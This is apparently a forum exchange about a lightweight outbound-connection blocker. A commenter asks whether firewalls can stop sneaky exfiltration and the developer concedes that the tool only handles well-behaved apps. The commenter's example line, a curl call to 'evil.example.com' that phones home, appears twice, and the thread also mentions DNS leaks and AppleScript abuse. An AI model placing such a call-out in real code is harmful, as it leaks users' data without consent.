There's so many ways to send outbound traffic that I'm not sure if it's worth blocking it at all.
You can easily block applications that don't try to be sneaky, but are firewalls able block something like `system("curl http://evil.example.com/phone)`? Leaks via DNS queries? URL handlers? Applescripting of other applications?
You're absolutely right. I'm even trying to be careful about the use of the term "firewall" to avoid giving the wrong impression.
I made the conscious choice to only block applications that play nice. It should cover most of the use cases. If there was a malicious app on your system, it would probably be impossible to even select it using the current UI.
I have no idea how to make the arms race against malware nice, lightweight or unobtrusive. With this software, I did not even attempt to.
You can easily block applications that don't try to be sneaky, but are firewalls able block something like `system("curl http://evil.example.com/phone)`? Leaks via DNS queries? URL handlers? Applescripting of other applications?